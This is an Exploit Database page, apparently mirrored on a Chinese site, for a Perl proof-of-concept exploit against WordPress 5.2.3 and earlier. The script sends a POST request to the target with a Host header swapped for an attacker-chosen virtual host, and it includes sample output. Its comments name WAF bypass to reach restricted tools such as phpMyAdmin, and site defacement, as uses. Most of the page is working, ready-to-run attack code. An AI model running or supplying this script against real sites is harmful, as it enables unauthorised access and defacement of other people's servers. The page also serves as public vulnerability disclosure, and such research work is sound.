WordPress Core 5.2.3 – Cross-Site Host Modification

• Exploit Database
• 19 阅读

• 作者： Todor Donev
  日期： 2019-09-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47361/

• #!/usr/bin/perl -w
  #
  #WordPress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
  #
  #Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
  #
  #Type: Remote
  #Risk: High
  #
  #Solution:
  #Set security headers to web server and no-cache for Cache-Control
  #
  #Simple Attack Scenarios:
  #
  # oThis attack can bypass Simple WAF to access restricted content on the web server,
  #something like phpMyAdmin;
  #
  # oThis attack can deface the vulnerable WordPress website with content from the default vhost;
  #
  #Disclaimer:
  #This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
  #The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
  #caused by direct or indirect use of theinformation or functionality provided by these programs. 
  #The author or any Internet providerbears NO responsibility for content or misuse of these programs 
  #or any derivatives thereof. By using these programs you accept the factthat any damage (dataloss, 
  #system crash, system compromise, etc.) caused by the useof these programs are not Todor Donev's 
  #responsibility.
  # 
  #Use them at your own risk!
  #
  # # WordPress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
  #	# ====================================================================================
  #	# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
  #	# >Host => default-vhost.com
  #	# >User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
  #	# >Content-Type => application/x-www-form-urlencoded
  #	# <Connection => close
  #	# <Date => Fri, 06 Sep 2019 11:39:43 GMT
  #	# <Location => https://default-vhost.com/
  #	# <Server => nginx
  #	# <Content-Type => text/html; charset=UTF-8
  #	# <Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
  #	# <Client-Peer => 13.37.13.37:443
  #	# <Client-Response-Num => 1
  #	# <Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
  #	# <Client-SSL-Cert-Subject => /CN=default-vhost.com
  #	# <Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
  #	# <Client-SSL-Socket-Class => IO::Socket::SSL
  #	# <Client-SSL-Warning => Peer certificate not verified
  #	# <Client-Transfer-Encoding => chunked
  #	# <Strict-Transport-Security => max-age=31536000;
  #	# <X-Powered-By => PHP/7.3.9
  #	# <X-Redirect-By => WordPress
  #	# ====================================================================================
  #
  #
  # 
  use strict;
  use v5.10;
  use HTTP::Request;
  use LWP::UserAgent;
  use WWW::UserAgent::Random;
  
  
  my $host = shift || '';
  my $attacker = shift || 'default-vhost.com';
  
  
  say "# WordPress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
  # ====================================================================================
  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
  if ($host !~ m/^http/){
  say"# e.g. perl $0 https://target:port/ default-vhost.com";
  exit;
  }
  
  my $user_agent = rand_ua("browsers");
  my $browser= LWP::UserAgent->new(
  protocols_allowed => ['http', 'https'],
  ssl_opts => { verify_hostname => 0 }
  );
   $browser->timeout(10);
   $browser->agent($user_agent);
  
  my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
  $request->header("Host" => $attacker);
  my $response = $browser->request($request);
  say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
  say "# >$_ => ", $request->header($_) for$request->header_field_names;
  say "# <$_ => ", $response->header($_) for$response->header_field_names;
  say "# ====================================================================================";